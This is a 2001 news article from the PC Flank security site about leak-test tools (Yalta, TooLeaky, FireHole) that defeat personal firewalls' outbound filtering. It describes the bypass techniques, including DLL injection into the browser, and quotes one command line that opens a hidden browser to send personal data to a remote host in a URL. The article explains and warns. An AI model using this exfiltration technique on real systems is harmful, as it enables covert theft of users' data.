Google
Web pcflank.com
PC Flank Logo
 Make sure
you're protected
on all sides
 Test Your System
 About PC Flank's tests
 PC Flank Leaktest NEW!
 Quick Test
 Stealth Test
 Browser Test
 Trojans Test
 Advanced Port Scanner
 Exploits Test
 Ask the experts
 Leak Tests Catalog NEW!
 FAQ
 Glossary
 Community
 Forum
 Security Center
 Software Store
 Books Store
 Articles Library
 Software Reviews
 Interviews

 

Tip of the day
Do not download unknown files from sites.
Security News

New Leak Tests: Today's Personal Firewalls have to be improved

November 8, 2001

New leaktest tools called "Yalta", "TooLeaky" and "FireHole" try to prove that outbound filtering feature used by most of personal firewalls is totally deceptive.

The most famous leaktest tool was made by the owner of GRC.com Steve Gibson. Gibson's test utility called "Leak Test" has proven the poor quality of most personal firewalls by bypassing outbound traffic detection feature. While the majority of firewalls relied on application trust levels set by the user it was shown that just replacing a trusted application with a malicious agent of the same name would make the firewall allow outbound traffic from the malicious program with all the privileges of the real version. Afterward the firewall' developers had fixed this bug by performing checksums of the trusted applications and warning the user if a dissimilar copy of the application was identified.

"Yalta", "Tooleaky" and "FireHole" use another technique to test firewalls' outbound filtering feature.

So, "Yalta" (http://www.soft4ever.com/security_test/En/index.htm) created by the developers of Look'n'Stop firewall "uses a different way than a classical leaktest to send packets". The main difference between "Yalta" and Gibson's "Leak Test" is Yalta uses UDP instead of TCP protocol. "Yalta" acts like a Trojan trying to send message to a remote address bypassing firewall' filters.

"Yalta" consists of two tests: the Classical Leak Test and the Enhanced Leak Test. The tool allows testing firewall both externally and locally. Most firewalls pass external test (when "Yalta" tries to send a message to remote IP) but having difficulties passing local test.

It seems that the only firewall that is able to pass "local test" is the Look'n'Stop firewall. But the point is that when you test your firewall "locally" and it fails, the sent message does not leave your computer at all. So should we consider it as a "leak"?

Mikhail Zakhryapin, the Director of Agnitum Ltd. (the developer of the Outpost firewall), says NO.

"I do not understand their hidden statement that all world-wide known firewalls is "leaky". "Leak" in everyone's opinion is when a firewall allows packets transmission to the net without user' knowledge. Using default Yalta settings packets even do not leave user PC!", said Mikhail in his message to users posted on the Agnitum' Forum.

On the other hand "TooLeaky" and "FireHole" use vulnerabilities of system's web browser to bypass firewall' outbound traffic detection system.

"TooLeaky" (http://tooleaky.zensoft.com) uses the system's web browser to transmit information without the knowledge of the user.

The tool opens your default web browser with the following command line:

iexplore.exe http://grc.com/lt/leaktest.htm?PersonalInfoGoesHere

The browser window is hidden so user does not notice it. If the web browser is allowed to access port 80 by the firewall then any personal data can be transmitted to remote address (GRC.com in this case). Such info can include anything including user' passwords, credit card information and much more.

Like "TooLeaky", "Firehole" (http://keir.net/firehole.html) uses default web browser to transmit the data to remote host. But the technique used by this tool is much more sophisticated and powerful.

"FireHole" installs a DLL file (with intercept function inside it) on user' computer. Then this DLL gets loaded up with any subsequent program and is treated as being in the same process space as that program. So "FireHole" uses the process space of system's default browser and as a result almost certainly trusted by the firewall.

Robin Keir, the creator of the tool, says "FireHole" is not limited in having to use the HTTP protocol and can send and receive any amount of data.

Although "FireHole" uses a flaws of web browsers it dramatically affects and questions the efficiency of outbound filtering feature used by today's of personal firewalls.

Now the turn goes to firewall' developers. While blocking the flaw used by "TooLeaky" seems to be a simple task, patching "FireHole" is not this easy.

Until the malicious agents that use the same techniques got to your computer you are safe. So never open and/or execute unknown e-mail attachments and to keep Antivirus and AntiTrojan, Firewall software up-to-date.

Discuss this article on the Forum

 
 
Start Page
Make "PC Flank" your   
Start Page!   
Make

 
In the Spotlight
» One man's job

» Outpost Firewall Pro Review

   
 

 
Sponsored links


   
 
Related Links
» Protect yourself
against Nimda worm

» New Nimda worm
could be more dangerous
than Code Red

» Stopping New Generation
of Internet Worms:
Mission Impossible?

   
 

 
   
Outpost Firewall PRO 3.0 - complete protection on the Internet!

Secure Internet surfing with Oupost personal firewall with antispyware and free firewall available for download at www.agnitum.com. 		 
Privacy Policy
    Advertiser Info		 Site Map
    Contact Us

 
 
© 2006 PC Flank Ltd. All rights reserved.